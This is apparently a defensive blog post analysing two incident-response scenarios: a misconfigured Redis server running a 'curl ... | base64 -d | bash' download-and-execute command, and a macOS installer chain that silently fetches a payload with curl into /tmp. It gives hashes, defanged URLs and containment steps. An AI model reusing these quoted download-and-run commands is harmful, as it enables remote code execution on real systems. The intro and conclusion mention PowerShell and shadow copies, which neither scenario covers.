Advanced Threat Detection: Exploitation Tactics from a CIRT Technical Interview

Introduction

As attackers continue to evolve their methods, exploiting misconfigurations and leveraging powerful tools like PowerShell becomes a common tactic. In this post, we delve into two scenarios where attackers exploit Redis misconfigurations and shadow copy utilities to gain unauthorized access and execute malicious payloads. These cases demonstrate the sophistication of modern attacks and the need for proactive defense measures.

Scenario #3

Scenario Overview

• Parent Process: redis-server
• Parent MD5: 9494cfd0f8c829acd9b1a88f9a0fd2ec
• Process CLI:

bash -c "curl hxxps://gist.githubusercontent[.]com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh | base64 -d | bash"

• Network Connection Count: 1

The Redis server process is exploited to execute a curl command that downloads and executes a base64-encoded script. This suggests a misconfigured Redis service being leveraged for remote command execution.

Step 1: What Happened?

• Parent Process:
  - The Redis server process (redis-server) initiated a child process, indicating potential exploitation.
  - Redis servers, when misconfigured, are known to be exploited by attackers to execute arbitrary commands.
• Command Execution:
  - The command uses curl to fetch a script from a GitHub Gist repository, decode it using base64, and immediately execute it via bash.
  - This is a classic example of a “living off the land” attack, leveraging pre-installed utilities like curl, base64, and bash to execute malicious payloads.

A “Living off the Land” (LOTL) attack is a sophisticated cyberattack technique where hackers use legitimate tools and features already present in the target system to conduct malicious activities. This method allows attackers to blend in with normal operations, making detection by traditional security measures challenging.

• Network Connection: The single network connection likely corresponds to the curl command’s retrieval of the remote script.

Step 2: Why is This Suspicious?

• Redis Exploitation: Redis servers are frequently targeted when misconfigured (e.g., lacking authentication or exposed to the internet). Attackers can exploit these weaknesses to execute unauthorized commands.
• Fetching Remote Scripts: Downloading and executing a remote script in a single command is highly suspicious and indicates malicious intent.
• Obfuscated URL: The use of a GitHub Gist URL (hxxps://gist.githubusercontent[.]com) and obfuscation (e.g., encoding with base64) suggests an attempt to evade detection.
• No User Interaction: The process chain indicates automated execution, likely part of a larger attack campaign targeting vulnerable servers.

Step 3: How Could This Happen?

• Exposed Redis Server: The Redis server might be misconfigured, allowing unauthorized access and command execution.
• Automated Attack Script: Attackers often scan for publicly accessible Redis servers and use automated scripts to inject malicious commands.
• Remote Code Execution: By fetching and executing the script from the GitHub Gist, the attacker likely aimed to install a backdoor, exfiltrate data, or gain persistent access.

Indicators of Compromise (IoCs)

To confirm malicious activity, focus on:

• File Hashes: Parent Process MD5: 9494cfd0f8c829acd9b1a88f9a0fd2ec Retrieve the downloaded script from the URL and calculate its hash for analysis.
• Network Activity: Identify and analyze connections to the GitHub Gist URL (hxxps://gist.githubusercontent[.]com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh).
• Command History: Review shell command execution logs to verify the full extent of activity related to this attack.

Recommended Actions

• Immediate Containment:
  - Isolate the Redis server to prevent further exploitation or command execution.
  - Block outbound traffic to suspicious URLs and IP addresses.
• Forensic Investigation:
  - Retrieve and analyze the script hosted at the GitHub Gist URL.
  - Review Redis server logs for unauthorized access and executed commands.
• Remediation:
  - Secure the Redis server by enabling authentication and restricting access to trusted IP addresses.
  - Patch Redis to the latest version to mitigate known vulnerabilities.
• Long-term Protection:
  - Deploy a Web Application Firewall (WAF) to monitor and block unauthorized requests.
  - Monitor for abnormal process chains and network activity using EDR solutions.
  - Educate administrators on securing Redis and other database services.

Scenario #4

Scenario Overview

• Grandparent Process: /private/tmp/b6yNLWzjO
• Grandparent MD5: ab47aa51b678216bc998fe7e5fe7aefd
• Grandparent CLI:

/tmp/b6yNLWzjO /Volumes/Installer/Installer.app/Contents/MacOS/LightEvening

• Parent Process: /bin/sh
• Parent MD5: 95d23ed8b5448779eee9863d2bc5c1ba
• Parent CLI:

sh -c curl -f0L -o /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63/45D77C73-D4A2-4698-A0A1-34926AEDF82D 'hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1' > /dev/null 2>&1

• Child Process: /usr/bin/curl
• Child MD5: 0846e04c22488b04222817529f235024
• Child CLI:

curl -f0L -o /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63/45D77C73-D4A2-4698-A0A1-34926AEDF82D hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1

• Network Connection Count: 2
• File Modifications: 3

A chain of processes involving curl downloads files from a CloudFront URL, storing them in the /tmp directory. This activity suggests malware targeting macOS systems.

Step 1: What Happened?

• Grandparent Process Activity:
  - The process /private/tmp/b6yNLWzjO executed an application from a mounted volume (/Volumes/Installer).
  - Temporary directories like /tmp are often used for staging malicious binaries or scripts due to their ephemeral nature.
• Parent Process Execution:
  - The parent process (/bin/sh) used a curl command to download a file from a remote server (hxxp://redacted.cloudfront[.]net) and saved it in another temporary directory (/tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63).
  - The > /dev/null 2>&1 syntax suppresses output and errors, a common technique to evade detection.

The command > /dev/null 2>&1 is used in Unix-like operating systems to redirect both standard output (stdout i.e., 1) and standard error (stderr i.e., 2) to /dev/null, effectively discarding them. /dev/null is a special file that discards all data written to it and provides no data to anyone who reads from it.

• Child Process (Curl): The curl utility made two network connections to fetch a file from the cloudfront.net domain.
• File Modifications: Three files were modified, possibly related to storing the downloaded payload and staging for further execution.

Step 2: Why is This Suspicious?

• Execution from Temporary Directories: Temporary directories like /private/tmp are often used to execute or store malicious files due to their transient nature and reduced visibility.
• Remote Resource Download: The curl command retrieves a file from a cloudfront.net domain. While legitimate services use CloudFront, it is also frequently abused by attackers to host malicious payloads.
• Output Suppression: Suppressing command output (> /dev/null 2>&1) is indicative of an attempt to hide activity.
• Unusual Process Chain: The process chain (“/tmp/b6yNLWzjO” → “/bin/sh” → “/usr/bin/curl”) is irregular for normal system operations, pointing to possible malicious intent.

Step 3: How Could This Happen?

• Initial Exploitation: The attacker may have exploited a vulnerability to drop and execute /private/tmp/b6yNLWzjO.
• Payload Delivery: The curl command fetched a remote payload from a CloudFront-hosted resource, likely intended for further exploitation or persistence.
• Persistence or Data Exfiltration: File modifications suggest either staging additional payloads or modifying system files for persistence or data exfiltration.

Indicators of Compromise (IoCs)

• File Hashes:
  - Grandparent MD5: ab47aa51b678216bc998fe7e5fe7aefd
- Parent MD5: 95d23ed8b5448779eee9863d2bc5c1ba
- Child MD5: 0846e04c22488b04222817529f235024
• File Paths:
  - /private/tmp/b6yNLWzjO
- /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63
• Network Activity: hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1

Recommended Actions

• Immediate Containment:
  - Isolate the affected system to prevent further execution of the malicious payload.
  - Block network access to the CloudFront domain and related IPs.
• Forensic Analysis:
  - Retrieve and analyze the file hosted at the CloudFront URL.
  - Investigate temporary directories for residual artifacts.
  - Review system logs for unauthorized process executions and file modifications.
• Remediation:
  - Remove all files and executables from temporary directories.
  - Patch any vulnerabilities that may have allowed the initial execution.
• Long-term Protection:
  - Monitor process chains for unusual behavior using EDR tools.
  - Implement restrictions on the use of utilities like curl in production systems.
  - Educate users and administrators about securing mounted volumes and temporary directories.

Conclusion

Scenarios #3 and #4 highlight how attackers exploit system vulnerabilities and abuse administrative tools to gain a foothold in their target environments. Detecting these activities requires robust monitoring, especially for high-risk utilities like PowerShell and exposed services like Redis. Stay tuned as we explore scenarios involving authentication and privilege escalation in the next installment.